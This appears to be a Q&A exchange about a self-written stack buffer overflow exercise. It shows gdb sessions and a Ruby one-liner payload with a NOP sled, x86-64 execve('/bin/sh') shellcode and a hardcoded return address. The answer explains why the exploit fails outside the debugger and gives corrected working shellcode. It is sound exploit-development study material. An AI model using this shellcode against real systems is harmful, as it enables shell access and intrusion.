(gdb) r (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
Starting program: /home/sidao/h4x0r/C-CPP-Projects/security/bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
process 13952 está executando novo programa: /bin/dash
$ ls
bof bof2.c bof3_env bof3_new_shellcode.txt bof3_shellcode.txt get_shell shellcode_exit shellcode_hello.c shellcode_shell2
bof.c bof3 bof3_env.c bof3_non_dbg func_stack get_shell.c shellcode_exit.c shellcode_shell shellcode_shell2.c
bof2 bof3.c bof3_gdb_env bof3_run_env func_stack.c shellcode_bof.c shellcode_hello shellcode_shell.c
$ exit
[Inferior 1 (process 13952) exited normally]
(gdb)
And outside:
$ ./bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
fish: Job 1, “./bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')” terminated by signal SIGSEGV (Address boundary error)
Immediately I searched about it and found this question: Buffer overflow works in gdb but not without it
Initially I thought it was just a matter of unsetting two environment variables and finding a new return address, but unsetting the two variables did not make the slightest difference:
$ gdb -q bof3
Lendo símbolos de bof3...concluído.
(gdb) unset env COLUMNS
(gdb) unset env LINES
(gdb) r (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
Starting program: /home/sidao/h4x0r/C-CPP-Projects/security/bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
process 14670 está executando novo programa: /bin/dash
$
So now, this is the second question: why does the exploit work inside GDB but not outside it?
The problem is the mov al,0x3b. You forgot to zero the top bits, so if they are not zero already, you will not be performing an execve syscall but something else. Simple debugging should have pointed this out to you. The solution is trivial: just insert xor eax, eax before that. Furthermore, since you append the return address to your exploit, the string will no longer be zero terminated. It's also easy to fix, by storing a zero there at runtime using for example mov [rdi + 7], al just after you have cleared eax.
The full exploit could look like:
ruby -e 'print "\x90" * 98 + "\xeb\x18\x5f\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05\x30\xc0\x88\x07\xb0\x3c\x0f\x05\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\xd0\xd8\xff\xff\xff\x7f"'
The initial part corresponds to:
jmp short push_shell
starter:
pop rdi
xor eax, eax
mov [rdi + 7], al
mov al, 59
Note that due to the code size change, the offset for the jmp and the call at the end had to be changed as well, and the number of nop instructions too.
The above code (with the return address adjusted for my system) works fine here.
